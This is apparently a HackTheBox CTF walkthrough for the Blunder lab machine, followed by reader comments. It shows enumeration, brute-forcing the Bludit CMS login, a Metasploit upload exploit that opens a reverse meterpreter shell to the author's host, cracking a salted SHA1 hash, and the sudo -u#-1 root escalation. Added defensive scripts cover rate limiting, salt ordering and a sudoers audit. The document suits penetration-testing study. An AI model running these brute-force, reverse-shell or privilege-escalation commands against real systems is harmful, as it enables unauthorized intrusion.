Blunder HackTheBox Walkthrough

This is a walkthrough of the Blunder HackTheBox machine. In it I will show how I exploited the machine and got the root flag. Before starting, a few facts about Blunder: it is a Linux machine, rated low difficulty by its maker, with the IP address 10.10.10.191.
Now I will show the step-by-step procedure to get the root flag on the Blunder machine.
First of all, connect your PC to the VPN so that you can reach the lab, and ping 10.10.10.191 to confirm that you are connected to the Blunder machine. I started by scanning 10.10.10.191 to get some hints on where to begin. Nmap, a port scanner, gave the following results.
Scanning the Machine
$nmap -sC -sV -oN scan 10.10.10.191

Only two ports open??
Let's perform a full port scan in case services are running on other ports that are not among nmap's top 1000 ports.
The full port scan gives the same result.
$nmap -sC -sV -p- -oN full_scan 10.10.10.191

Tip: It is a good idea to perform a full port scan during CTF hunting or penetration testing, because some open ports may not be among nmap's top 1000 ports.
Ports 21 and 80 are open. An Apache2 web server is running on port 80. After some enumeration I found the website is running on Bludit CMS, version 3.9.2, as revealed by this URL: http://10.10.10.191/bl-kernel/css/bootstrap.min.css?version=3.9.2
As usual, my next step was to search whether any exploit is available for the CMS. I just googled Bludit CMS 3.9.2 exploit and found this appropriate link. For more details google CVE-2019-17240. searchsploit also gives this result.
$searchsploit bludit

There is a metasploit module for Bludit. After opening it in metasploit I found it requires a Username and Password. So we need a username and password to use this module.
$msfdb run
msf5>search bludit
msf5>show info exploit/linux/http/bludit_upload_images_exec

I left it here and moved on to find some other information. I did directory brute forcing with dirsearch and the wordlist directory-list-2.3-small.txt, but didn't find any interesting file. I got a hint from the HTB forum about a txt file, so I tried to FUZZ for hidden text files in the URL.
Fuzzing URL
$wfuzz -c -w /usr/share/seclists/Discovery/Web-Content/common.txt --hc 404,403 -u "http://10.10.10.191/FUZZ.txt" -t 100

Got the file todo.txt. After reading its content at http://10.10.10.191/todo.txt it appears that fergus is a user. I added it to my notes and continued enumeration.
Tip: It is a good idea to take notes of all interesting findings as you go, because sometimes they show you the way to proceed further.

Now we have a username and need a password. Let's make our own wordlist using cewl, a well-known wordlist generator.
Creating Custom Wordlist
$cewl -d 3 -m 5 -w custom_wordlist.txt http://10.10.10.191/

Modify the script at https://rastating.github.io/bludit-brute-force-mitigation-bypass/ as follows. For username use fergus, because we want to brute force the user fergus, and for fname use the name of the custom wordlist you created with the cewl command; in my case it is custom_wordlist.txt. Save it as poc.py and run it.
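Why the brute-force mitigation could be bypassed, and what a robust limiter looks like, as an added example that is not part of the original post or of Bludit's own code: the CMS counted failed logins per client IP but took that IP from request headers the client controls, so a limiter keyed on such a header never locks anyone out. The `Limiter`, `header_ip`, `peer_ip` and `simulate` names, the threshold of 10 and all request values below are constructed for this example.

```python
"""Added example (not from the original walkthrough or from Bludit's code).

A failed-login counter is only as strong as the key it counts under. The weak
limiter keys on X-Forwarded-For, which any client can set to a fresh value per
request; the hardened one keys on the TCP peer address, which only a trusted
reverse proxy (if one is deployed) should be allowed to override.
"""
from collections import defaultdict

MAX_FAILURES = 10  # lockout threshold, chosen for this example


class Limiter:
    """Counts failed logins per key and refuses once the threshold is reached."""

    def __init__(self, key_func):
        self.key_func = key_func
        self.failures = defaultdict(int)

    def allowed(self, request) -> bool:
        return self.failures[self.key_func(request)] < MAX_FAILURES

    def record_failure(self, request) -> None:
        self.failures[self.key_func(request)] += 1


def header_ip(request) -> str:
    # Weak: trusts a client-supplied header before the real peer address.
    return request["headers"].get("X-Forwarded-For", request["remote_addr"])


def peer_ip(request) -> str:
    # Hardened: uses the socket peer address; the header is ignored.
    return request["remote_addr"]


def simulate(limiter: Limiter, attempts: int, rotate_header: bool) -> int:
    """Send `attempts` failed logins from one peer; return how many got through."""
    accepted = 0
    for i in range(attempts):
        # Constructed request: same peer every time, header varies if rotated.
        headers = {"X-Forwarded-For": f"203.0.113.{i % 250}"} if rotate_header else {}
        req = {"remote_addr": "198.51.100.7", "headers": headers}
        if limiter.allowed(req):
            accepted += 1
            limiter.record_failure(req)
    return accepted


if __name__ == "__main__":
    print("header-keyed, rotating header :", simulate(Limiter(header_ip), 100, True))
    print("peer-keyed, rotating header   :", simulate(Limiter(peer_ip), 100, True))
```

The peer-keyed limiter stops at the threshold regardless of what the client puts in the header; the header-keyed one accepts every attempt. If the application sits behind a reverse proxy, the proxy itself should set the forwarded header and the application should accept it only from the proxy's address.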

Cracking Password
$python poc.py

So we have the credentials fergus : RolandDeschain. It's time to exploit and get a remote shell on our PC.
We have two ways to get shell.
1. Either use metasploit module or
2. Manually upload file to the website by logging in http://10.10.10.191/admin/ with creds fergus : RolandDeschain and intercept using Burp Suite to modify requests. For more info visit https://github.com/bludit/bludit/issues/1079 this link.
I preferred the first because it doesn't require much effort, and you know how lazy we are about doing things manually when an automated option exists. 🙂
Try the payload php/meterpreter_reverse_tcp instead of php/meterpreter/reverse_tcp if the latter fails to give you a proper meterpreter shell.
Getting User Shell
$ msfdb run
msf5 > search bludit
msf5 > use exploit/linux/http/bludit_upload_images_exec
msf5 exploit(linux/http/bludit_upload_images_exec) > set BLUDITUSER fergus
msf5 exploit(linux/http/bludit_upload_images_exec) > set BLUDITPASS RolandDeschain
msf5 exploit(linux/http/bludit_upload_images_exec) > set payload php/meterpreter/reverse_tcp
msf5 exploit(linux/http/bludit_upload_images_exec) > set LHOST 10.10.15.87
msf5 exploit(linux/http/bludit_upload_images_exec) > exploit
meterpreter > sysinfo

Alright, we have a meterpreter shell. I used the shell command to drop to a system shell and then upgraded it to a fully interactive Linux shell.
meterpreter > shell
$which python
$python -c 'import pty;pty.spawn("/bin/bash")'
www-data@blunder:/var/www/bludit-3.9.2/bl-content/tmp$ export TERM=xterm-256color

So we are in the Blunder HTB machine. Let us grab the user flag. Inside the home directory two users, hugo and shaun, are present. The user flag is inside hugo's folder, but www-data does not have permission to read it; only hugo does. I tried $su hugo in case hugo and fergus share the same password, but login failed, presumably due to an incorrect password. To access the user flag we have to log in as hugo. After manual enumeration I found a file users.php inside the directory /var/www/bludit-3.9.2/bl-content/databases/.

Got the password hash along with its salt:
Password: bfcc887f62e36ea019e3295aafb8a3885966e265
Salt: 5dde2887e7aca
Now we have to crack this hash. Hash identifier says it is a SHA1 hash.
Identify Type of Hash

I tried to crack it using hashcat and the rockyou.txt wordlist but could not. So I tried the site https://cmd5.com/ and successfully cracked the hash. The password is Password120, so the credential is hugo : Password120.
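The hash above is a salted SHA1, and online lookup services only succeed if they are given the salt and password in the order the application concatenates them, which is why a plain lookup can fail. The following script, an added example that is not part of the walkthrough or of Bludit's code, checks a candidate password against a stored hash under both orderings and reports which convention matches. `salted_sha1` and `identify_order` are names chosen here; the stored hash, salt and candidate are the values given above.

```python
"""Added example, not from the original walkthrough or from Bludit itself.

Whether the salt goes before or after the password depends on the application's
code. Given a stored hash, its salt and a candidate password, this script tries
both conventions and says which one (if any) reproduces the hash.
"""
import hashlib

STORED_HASH = "bfcc887f62e36ea019e3295aafb8a3885966e265"  # from the walkthrough
SALT = "5dde2887e7aca"                                    # from the walkthrough
CANDIDATE = "Password120"                                 # from the walkthrough


def salted_sha1(salt: str, password: str, salt_first: bool) -> str:
    """Hex SHA1 of salt+password (salt_first=True) or password+salt."""
    data = (salt + password) if salt_first else (password + salt)
    return hashlib.sha1(data.encode()).hexdigest()


def identify_order(stored_hash: str, salt: str, candidate: str):
    """Return 'salt_first', 'pass_first', or None if the candidate matches neither."""
    stored_hash = stored_hash.strip().lower()
    if salted_sha1(salt, candidate, True) == stored_hash:
        return "salt_first"
    if salted_sha1(salt, candidate, False) == stored_hash:
        return "pass_first"
    return None


if __name__ == "__main__":
    print(identify_order(STORED_HASH, SALT, CANDIDATE))
```

Once the ordering is known, the same check tells a defender how exposed the credential store is: a single unsalted or salted SHA1 per user is cheap to verify offline, which is why modern applications use a deliberately slow password hash such as bcrypt or Argon2 instead.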
Switch user to hugo
$su hugo
Password: Password120
Grab User Flag

Privilege Escalation
Let's check what special permissions hugo has.
$sudo -l

Tip: Whenever you get a shell, try to execute
$sudo -l
to check which special command [*] the current user can run, then google 'how to escalate privilege using [*] command'. You may get your answer easily. For example, in this case google (ALL, !root) /bin/bash
Got: User hugo may run the following commands on blunder:
(ALL, !root) /bin/bash
After googling (ALL, !root) /bin/bash I found our privilege escalation vector in the first link, viz. a vulnerable version of sudo. See this link.
After reading the exploit PoC we can get a root shell with just one command. Let's do it.
Getting Root Shell
$sudo -u#-1 /bin/bash
Enter the password Password120.
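The sudo -l tip and the (ALL, !root) rule above are worth turning into a check that a defender or auditor can run over sudoers output. The script below is an added example, not part of the walkthrough: it flags Runas specifications that grant ALL while excluding users by negation, which is a blocklist and, on sudo releases before 1.8.28 (the fixing release, from my own knowledge rather than from the page), is exactly what the -u#-1 trick turned into root. The `runas_bypassable`, `parse_version` and `audit` names and the sample lines are constructed for this example.

```python
"""Added example, not from the original walkthrough.

Audits `sudo -l` style lines for Runas lists of the form (ALL, !user).
Negation in a Runas list only removes named users from an otherwise
unlimited set, so such rules should be rewritten to list the intended
target users explicitly. Findings are rated HIGH on sudo older than the
release that fixed the uid -1 bypass and MEDIUM otherwise.
"""
import re

RUNAS_RE = re.compile(r"^\s*\(([^)]*)\)\s*(.+)$")
FIXED_VERSION = (1, 8, 28)  # sudo release that fixed the -u#-1 bypass (assumption from my knowledge)


def parse_version(text: str):
    """Turn strings like '1.8.25p1' or '1.8.31' into a comparable tuple."""
    m = re.match(r"(\d+)\.(\d+)\.(\d+)", text.strip())
    if not m:
        raise ValueError(f"unrecognised sudo version: {text!r}")
    return tuple(int(x) for x in m.groups())


def runas_bypassable(line: str) -> bool:
    """True if the Runas user list is 'ALL' narrowed only by negated entries."""
    m = RUNAS_RE.match(line)
    if not m:
        return False
    runas_users = m.group(1).split(":")[0]  # drop the optional group list after ':'
    entries = [e.strip() for e in runas_users.split(",")]
    has_all = any(e == "ALL" for e in entries)
    has_negation = any(e.startswith("!") for e in entries)
    return has_all and has_negation


def audit(sudo_l_lines, sudo_version: str):
    """Return (severity, line) findings for every ALL-plus-negation Runas rule."""
    old_sudo = parse_version(sudo_version) < FIXED_VERSION
    findings = []
    for line in sudo_l_lines:
        if runas_bypassable(line):
            severity = "HIGH" if old_sudo else "MEDIUM"
            findings.append((severity, line.strip()))
    return findings


if __name__ == "__main__":
    # Constructed sample in the shape of `sudo -l` output, not captured from a real host.
    sample = [
        "    (ALL, !root) /bin/bash",
        "    (hugo) /usr/bin/less",
        "    (ALL : ALL) ALL",
    ]
    for severity, rule in audit(sample, "1.8.25p1"):
        print(f"{severity}: {rule}")
```

The safe rewrite is an allowlist of the users the command is meant to run as, for example (hugo, shaun) instead of (ALL, !root), together with keeping sudo at a fixed release; the MEDIUM rating reminds the reviewer that the blocklist is still overly broad even once the version bug is patched.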

Grab Root Flag
Grab the root flag from the root folder.
$cd /root/
$cat root.txt

This is how I got root on the Blunder HackTheBox machine. I hope you have learned something from my approach. If you have any issue or question, please let me know at [email protected] or in the comment section. Thanks for reading this walkthrough.
For more HackTheBox walkthroughs, visit ethicalhacs.com.
Please post walkthroughs for other boxes too! Your website is a great help when I'm stuck somewhere.
Thanks bro. I am working on it.
Hey bro, I did pretty much everything; only the password hash cracking is giving me problems because cmd5.com is Chinese. I tried cmd5.org and many other SHA1 decrypters but no luck. Any ideas?
Alternatively, you can get crackable hash at
$www-data@blunder:/var/www/bludit-3.10.0a/bl-content/databases$ cat users.php
and try to crack the hash at crackstation.net
Hi, this cracking procedure didn't work. I tried with crackstation and cmd5.com and it was not cracked; I think it is something with the salt position.
Could you please show us the format that you put in cmd5.com?
Thanks and regards,
The format is sha1($Salt.$Pass) and this hash is not present on crackstation.net. There is also another hash present in
$www-data@blunder:/var/www/bludit-3.10.0a/bl-content/databases$ cat users.php. This hash is without salt and can be cracked easily at crackstation.net.
Hey! Thanks for the walkthrough. Can you please explain “sudo -u#-1 /bin/bash”. Or give any resources.
I have just taken this exploit from https://www.exploit-db.com/exploits/47502. For more info on Linux Privilege Escalation using Sudo Rights you can check out this link.
Hi, I am currently slightly stuck on the meterpreter shell upgrade to a system shell. I tried different payloads and still am not able to proceed further. Only getting this:
meterpreter > shell
Process 2740 created.
Channel 0 created.
^[[A
any idea?
Thank you.
I think when a new channel is created it means you have a shell session open and you can interact with this session using normal commands. You may or may not get a shell prompt after running the shell command in meterpreter, but normal Linux commands should always work in a typical shell session created by meterpreter, which is the case above. Try to run some basic Linux commands like whoami, id, ls, etc. to confirm whether you are able to run commands or not. If you get output from the command then use python -c 'import pty;pty.spawn("/bin/bash")' to upgrade the shell to a shell prompt.